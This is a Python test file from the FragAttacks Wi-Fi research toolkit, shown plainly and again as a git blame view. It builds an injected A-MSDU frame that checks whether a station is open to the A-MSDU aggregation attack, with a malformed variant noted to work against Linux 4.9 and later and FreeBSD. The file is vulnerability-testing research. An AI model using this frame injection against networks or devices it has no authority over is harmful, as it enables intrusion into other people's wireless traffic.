fragattacks/research/tests_attacks.py

# Copyright (c) 2020, Mathy Vanhoef <mathy.vanhoef@nyu.edu>
#
# This code may be distributed under the terms of the BSD license.
# See README for more details.

from fraginternals import *

class AmsduInject(Test):
	"""
	Inject a frame identical to the one the station would receive when performing
	the A-MSDU attack by injecting an IP packet with a specific identification field.
	"""

	def __init__(self, ptype, malformed=False):
		super().__init__([
			Action(Action.Connected, Action.GetIp, enc=True),
			Action(Action.Connected, Action.Inject, enc=True)]
		)
		self.ptype = ptype
		self.malformed = malformed

	def prepare(self, station):
		log(STATUS, "Generating A-MSDU attack test frame", color="green")

		# Generate the header and payload
		header, request, self.check_fn = generate_request(station, self.ptype)

		# This checks if the to-DS is set (frame towards the AP) --- XXX Utility function for this?
		if header.FCfield & 1 != 0:
			src = station.mac
			dst = station.get_peermac()
		else:
			dst = station.peermac
			src = station.bss

		# Put the request inside an IP packet
		if not self.malformed:
			p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="1.2.3.4", id=34)/TCP()

		# This works against linux 4.9 and above and against FreeBSD
		else:
			p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="3.5.1.1")/TCP()/Raw(b"A" * 748)

		p = p/create_msdu_subframe(src, dst, request, last=True)
		set_amsdu(p[Dot11QoS])

		# Schedule transmission of frame
		self.actions[0].frame = p
fragattack: add copyright banners 2020-06-28 04:35:45 -04:00			`# Copyright (c) 2020, Mathy Vanhoef <mathy.vanhoef@nyu.edu>`
			`#`
			`# This code may be distributed under the terms of the BSD license.`
			`# See README for more details.`

fragattack: restructured Python files 2020-05-28 09:10:37 -04:00			`from fraginternals import *`
fragattack: test A-MSDU attack and Linux variant 2020-05-27 01:43:52 -04:00
fragattacks: tweak A-MSDU injection tests 2020-05-28 21:02:19 -04:00			`class AmsduInject(Test):`
fragattack: test A-MSDU attack and Linux variant 2020-05-27 01:43:52 -04:00			`"""`
			`Inject a frame identical to the one the station would receive when performing`
			`the A-MSDU attack by injecting an IP packet with a specific identification field.`
			`"""`

fragattacks: improve test names and argument parsing 2020-07-30 09:53:46 -04:00			`def __init__(self, ptype, malformed=False):`
fragattacks: let amsdu-inject first get IP 2020-06-10 19:09:19 -04:00			`super().__init__([`
			`Action(Action.Connected, Action.GetIp, enc=True),`
			`Action(Action.Connected, Action.Inject, enc=True)]`
			`)`
fragattack: test A-MSDU attack and Linux variant 2020-05-27 01:43:52 -04:00			`self.ptype = ptype`
fragattacks: improve test names and argument parsing 2020-07-30 09:53:46 -04:00			`self.malformed = malformed`
fragattack: test A-MSDU attack and Linux variant 2020-05-27 01:43:52 -04:00
			`def prepare(self, station):`
			`log(STATUS, "Generating A-MSDU attack test frame", color="green")`

			`# Generate the header and payload`
			`header, request, self.check_fn = generate_request(station, self.ptype)`

			`# This checks if the to-DS is set (frame towards the AP) --- XXX Utility function for this?`
			`if header.FCfield & 1 != 0:`
			`src = station.mac`
			`dst = station.get_peermac()`
			`else:`
			`dst = station.peermac`
			`src = station.bss`

			`# Put the request inside an IP packet`
fragattacks: improve test names and argument parsing 2020-07-30 09:53:46 -04:00			`if not self.malformed:`
fragattack: test A-MSDU attack and Linux variant 2020-05-27 01:43:52 -04:00			`p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="1.2.3.4", id=34)/TCP()`
fragattacks: tweak A-MSDU injection tests 2020-05-28 21:02:19 -04:00
			`# This works against linux 4.9 and above and against FreeBSD`
fragattacks: improve test names and argument parsing 2020-07-30 09:53:46 -04:00			`else:`
fragattacks: tweak A-MSDU injection tests 2020-05-28 21:02:19 -04:00			`p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="3.5.1.1")/TCP()/Raw(b"A" * 748)`
fragattacks: improve test names and argument parsing 2020-07-30 09:53:46 -04:00
fragattacks: fix amsdu-inject test case 2020-06-09 07:18:27 -04:00			`p = p/create_msdu_subframe(src, dst, request, last=True)`
fragattack: use set_amsdu and is_amsdu functions 2021-01-16 05:39:21 -05:00			`set_amsdu(p[Dot11QoS])`
fragattack: test A-MSDU attack and Linux variant 2020-05-27 01:43:52 -04:00
			`# Schedule transmission of frame`
			`self.actions[0].frame = p`